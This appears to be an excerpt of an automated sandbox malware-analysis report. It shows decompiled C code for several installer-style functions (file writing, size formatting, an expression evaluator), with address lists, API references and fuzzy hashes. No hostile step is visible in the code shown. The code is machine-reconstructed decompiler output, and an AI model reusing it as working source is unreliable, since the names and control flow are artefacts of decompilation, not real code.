                                                                                                                                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                                                                                                                                            • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                                                                                                                            • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00402950(void* __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                                                                                                                                                            0x00402950
                                                                                                                                                                                                                            0x00402952
                                                                                                                                                                                                                            0x00402957
                                                                                                                                                                                                                            0x0040295c
                                                                                                                                                                                                                            0x0040295f
                                                                                                                                                                                                                            0x00402969
                                                                                                                                                                                                                            0x0040296d
                                                                                                                                                                                                                            0x0040296d
                                                                                                                                                                                                                            0x00402973
                                                                                                                                                                                                                            0x00402980
                                                                                                                                                                                                                            0x00402988
                                                                                                                                                                                                                            0x0040298b
                                                                                                                                                                                                                            0x00402997
                                                                                                                                                                                                                            0x0040299a
                                                                                                                                                                                                                            0x004029a0
                                                                                                                                                                                                                            0x004029ae
                                                                                                                                                                                                                            0x004029b3
                                                                                                                                                                                                                            0x004029b7
                                                                                                                                                                                                                            0x004029ba
                                                                                                                                                                                                                            0x004029c3
                                                                                                                                                                                                                            0x004029cf
                                                                                                                                                                                                                            0x004029d3
                                                                                                                                                                                                                            0x004029d6
                                                                                                                                                                                                                            0x004029e0
                                                                                                                                                                                                                            0x004029ff
                                                                                                                                                                                                                            0x004029e7
                                                                                                                                                                                                                            0x004029ec
                                                                                                                                                                                                                            0x004029f4
                                                                                                                                                                                                                            0x004029f7
                                                                                                                                                                                                                            0x004029fc
                                                                                                                                                                                                                            0x004029fc
                                                                                                                                                                                                                            0x00402a06
                                                                                                                                                                                                                            0x00402a06
                                                                                                                                                                                                                            0x00402a13
                                                                                                                                                                                                                            0x00402a19
                                                                                                                                                                                                                            0x00402a1f
                                                                                                                                                                                                                            0x00402a1f
                                                                                                                                                                                                                            0x004029b7
                                                                                                                                                                                                                            0x00402a33
                                                                                                                                                                                                                            0x00402a35
                                                                                                                                                                                                                            0x00402a35
                                                                                                                                                                                                                            0x00402a3f
                                                                                                                                                                                                                            0x00402a40
                                                                                                                                                                                                                            0x00402a44
                                                                                                                                                                                                                            0x00402a48
                                                                                                                                                                                                                            0x00402a4e
                                                                                                                                                                                                                            0x00402a4e
                                                                                                                                                                                                                            0x00402a55
                                                                                                                                                                                                                            0x004022f1
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00402A06
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00402A19
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2667972263-0
                                                                                                                                                                                                                            • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                                                                                                                            • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                                                                                                                                                                                            0x00404e7a
                                                                                                                                                                                                                            0x00404e7f
                                                                                                                                                                                                                            0x00404e87
                                                                                                                                                                                                                            0x00404e88
                                                                                                                                                                                                                            0x00404e95
                                                                                                                                                                                                                            0x00404e9d
                                                                                                                                                                                                                            0x00404e9e
                                                                                                                                                                                                                            0x00404ea0
                                                                                                                                                                                                                            0x00404ea2
                                                                                                                                                                                                                            0x00404ea4
                                                                                                                                                                                                                            0x00404ea7
                                                                                                                                                                                                                            0x00404ea7
                                                                                                                                                                                                                            0x00404eae
                                                                                                                                                                                                                            0x00404eb4
                                                                                                                                                                                                                            0x00404eb4
                                                                                                                                                                                                                            0x00404ebb
                                                                                                                                                                                                                            0x00404ec2
                                                                                                                                                                                                                            0x00404ec5
                                                                                                                                                                                                                            0x00404ec8
                                                                                                                                                                                                                            0x00404ec8
                                                                                                                                                                                                                            0x00404ecc
                                                                                                                                                                                                                            0x00404edc
                                                                                                                                                                                                                            0x00404ede
                                                                                                                                                                                                                            0x00404ee1
                                                                                                                                                                                                                            0x00404e8a
                                                                                                                                                                                                                            0x00404e8a
                                                                                                                                                                                                                            0x00404e91
                                                                                                                                                                                                                            0x00404e91
                                                                                                                                                                                                                            0x00404ee9
                                                                                                                                                                                                                            0x00404ef4
                                                                                                                                                                                                                            0x00404f0a
                                                                                                                                                                                                                            0x00404f1b
                                                                                                                                                                                                                            0x00404f37

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404F1B
                                                                                                                                                                                                                            • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                            • String ID: %u.%u%s%s$H7B
                                                                                                                                                                                                                            • API String ID: 3540041739-107966168
                                                                                                                                                                                                                            • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                                                                                                                                                            • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 687E1979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                                                                            			E687E1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x687e506c = _a8;
				_t77 = 0;
				 *0x687e5070 = _a16;
				_v12 = 0;
				_v8 = E687E12E3();
				_t90 = E687E13B1(_t42);
				_t87 = _t85;
				_t81 = E687E12E3();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E687E12E3();
					_t77 = E687E13B1(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81 & 0x0000ffff;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
						if( *((short*)(_t81 + 2)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E687E1510(_t85, _t90, _t87,  &_v76);
								E687E1312( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E687E3050(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
						if( *((short*)(_t81 + 2)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((short*)(_t81 + 4)) != 0x3e) {
							_t48 = E687E3070(_t59, _t83, _t85);
						} else {
							_t48 = E687E30A0(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
						if( *((short*)(_t81 + 2)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E687E2EE0(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E687E2F90(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((short*)(_t81 + 2)) - 0x26;
					if( *((short*)(_t81 + 2)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E687E2EA0(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                                                                                                                                                            0x687e1979
                                                                                                                                                                                                                            0x687e1983
                                                                                                                                                                                                                            0x687e198c
                                                                                                                                                                                                                            0x687e198f
                                                                                                                                                                                                                            0x687e1994
                                                                                                                                                                                                                            0x687e199d
                                                                                                                                                                                                                            0x687e19a6
                                                                                                                                                                                                                            0x687e19a8
                                                                                                                                                                                                                            0x687e19af
                                                                                                                                                                                                                            0x687e19b1
                                                                                                                                                                                                                            0x687e19b4
                                                                                                                                                                                                                            0x687e19bb
                                                                                                                                                                                                                            0x687e19c9
                                                                                                                                                                                                                            0x687e19d2
                                                                                                                                                                                                                            0x687e19d7
                                                                                                                                                                                                                            0x687e19da
                                                                                                                                                                                                                            0x687e19e0
                                                                                                                                                                                                                            0x687e19e0
                                                                                                                                                                                                                            0x687e19e3
                                                                                                                                                                                                                            0x687e19e6
                                                                                                                                                                                                                            0x687e19e9
                                                                                                                                                                                                                            0x687e1ab1
                                                                                                                                                                                                                            0x687e1ab1
                                                                                                                                                                                                                            0x687e1ab4
                                                                                                                                                                                                                            0x687e1b34
                                                                                                                                                                                                                            0x687e1b39
                                                                                                                                                                                                                            0x687e1b48
                                                                                                                                                                                                                            0x687e1b4b
                                                                                                                                                                                                                            0x687e1b53
                                                                                                                                                                                                                            0x687e1b53
                                                                                                                                                                                                                            0x687e1b53
                                                                                                                                                                                                                            0x687e1b55
                                                                                                                                                                                                                            0x687e1b55
                                                                                                                                                                                                                            0x687e1b56
                                                                                                                                                                                                                            0x687e1b56
                                                                                                                                                                                                                            0x687e1b58
                                                                                                                                                                                                                            0x687e1b5a
                                                                                                                                                                                                                            0x687e1b60
                                                                                                                                                                                                                            0x687e1b69
                                                                                                                                                                                                                            0x687e1b7a
                                                                                                                                                                                                                            0x687e1b85
                                                                                                                                                                                                                            0x687e1b85
                                                                                                                                                                                                                            0x687e1b4d
                                                                                                                                                                                                                            0x687e1b2f
                                                                                                                                                                                                                            0x687e1b2f
                                                                                                                                                                                                                            0x687e1b31
                                                                                                                                                                                                                            0x687e1b31
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b31
                                                                                                                                                                                                                            0x687e1b4f
                                                                                                                                                                                                                            0x687e1b51
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b51
                                                                                                                                                                                                                            0x687e1b3d
                                                                                                                                                                                                                            0x687e1b41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b41
                                                                                                                                                                                                                            0x687e1ab6
                                                                                                                                                                                                                            0x687e1ab6
                                                                                                                                                                                                                            0x687e1ab7
                                                                                                                                                                                                                            0x687e1b26
                                                                                                                                                                                                                            0x687e1b28
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b2a
                                                                                                                                                                                                                            0x687e1b2d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b2d
                                                                                                                                                                                                                            0x687e1ab9
                                                                                                                                                                                                                            0x687e1ab9
                                                                                                                                                                                                                            0x687e1aba
                                                                                                                                                                                                                            0x687e1af7
                                                                                                                                                                                                                            0x687e1afc
                                                                                                                                                                                                                            0x687e1b19
                                                                                                                                                                                                                            0x687e1b1c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b1e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b20
                                                                                                                                                                                                                            0x687e1b22
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b24
                                                                                                                                                                                                                            0x687e1afe
                                                                                                                                                                                                                            0x687e1b03
                                                                                                                                                                                                                            0x687e1b05
                                                                                                                                                                                                                            0x687e1b07
                                                                                                                                                                                                                            0x687e1b09
                                                                                                                                                                                                                            0x687e1b12
                                                                                                                                                                                                                            0x687e1b0b
                                                                                                                                                                                                                            0x687e1b0b
                                                                                                                                                                                                                            0x687e1b0b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b09
                                                                                                                                                                                                                            0x687e1abc
                                                                                                                                                                                                                            0x687e1abc
                                                                                                                                                                                                                            0x687e1abf
                                                                                                                                                                                                                            0x687e1af0
                                                                                                                                                                                                                            0x687e1af2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1af2
                                                                                                                                                                                                                            0x687e1ac1
                                                                                                                                                                                                                            0x687e1ac1
                                                                                                                                                                                                                            0x687e1ac4
                                                                                                                                                                                                                            0x687e1ad7
                                                                                                                                                                                                                            0x687e1adc
                                                                                                                                                                                                                            0x687e1ae9
                                                                                                                                                                                                                            0x687e1aeb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1aeb
                                                                                                                                                                                                                            0x687e1ade
                                                                                                                                                                                                                            0x687e1ae0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1ae2
                                                                                                                                                                                                                            0x687e1ae5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1ae7
                                                                                                                                                                                                                            0x687e1ac7
                                                                                                                                                                                                                            0x687e1ac8
                                                                                                                                                                                                                            0x687e1ace
                                                                                                                                                                                                                            0x687e1ad0
                                                                                                                                                                                                                            0x687e1ad0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1ac8
                                                                                                                                                                                                                            0x687e19ef
                                                                                                                                                                                                                            0x687e1a68
                                                                                                                                                                                                                            0x687e1a6a
                                                                                                                                                                                                                            0x687e1a6d
                                                                                                                                                                                                                            0x687e1a8b
                                                                                                                                                                                                                            0x687e1a8e
                                                                                                                                                                                                                            0x687e1a94
                                                                                                                                                                                                                            0x687e1a99
                                                                                                                                                                                                                            0x687e1a6f
                                                                                                                                                                                                                            0x687e1a6f
                                                                                                                                                                                                                            0x687e1a73
                                                                                                                                                                                                                            0x687e1a77
                                                                                                                                                                                                                            0x687e1a79
                                                                                                                                                                                                                            0x687e1a79
                                                                                                                                                                                                                            0x687e1a9c
                                                                                                                                                                                                                            0x687e1aa0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1aa6
                                                                                                                                                                                                                            0x687e1aa6
                                                                                                                                                                                                                            0x687e1aa9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1aa9
                                                                                                                                                                                                                            0x687e1aa0
                                                                                                                                                                                                                            0x687e19f1
                                                                                                                                                                                                                            0x687e19f4
                                                                                                                                                                                                                            0x687e1a59
                                                                                                                                                                                                                            0x687e1a5b
                                                                                                                                                                                                                            0x687e1a5d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1a63
                                                                                                                                                                                                                            0x687e19f6
                                                                                                                                                                                                                            0x687e19f9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e19fb
                                                                                                                                                                                                                            0x687e19fc
                                                                                                                                                                                                                            0x687e1a32
                                                                                                                                                                                                                            0x687e1a37
                                                                                                                                                                                                                            0x687e1a4f
                                                                                                                                                                                                                            0x687e1a51
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1a51
                                                                                                                                                                                                                            0x687e1a39
                                                                                                                                                                                                                            0x687e1a3b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1a41
                                                                                                                                                                                                                            0x687e1a44
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1a4a
                                                                                                                                                                                                                            0x687e19fe
                                                                                                                                                                                                                            0x687e1a01
                                                                                                                                                                                                                            0x687e1a28
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1a03
                                                                                                                                                                                                                            0x687e1a03
                                                                                                                                                                                                                            0x687e1a04
                                                                                                                                                                                                                            0x687e1a18
                                                                                                                                                                                                                            0x687e1a1a
                                                                                                                                                                                                                            0x687e1a06
                                                                                                                                                                                                                            0x687e1a08
                                                                                                                                                                                                                            0x687e1a0e
                                                                                                                                                                                                                            0x687e1a10
                                                                                                                                                                                                                            0x687e1a10
                                                                                                                                                                                                                            0x687e1a08
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1a04

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                            • Opcode ID: 3e2625d302410a43f8f232d0d6b254f0c83f3de2b481c7e7a5cd689b4b7dc063
                                                                                                                                                                                                                            • Instruction ID: 0f43ad9ab5d922abc06eda50201b913675f1190cdb396e72b726d13e4fd9a517
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e2625d302410a43f8f232d0d6b254f0c83f3de2b481c7e7a5cd689b4b7dc063
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E51A436D04118EA8B109FA8C75E5BD76BEEB4531FFC181B9F424A3210E771AE8587B1
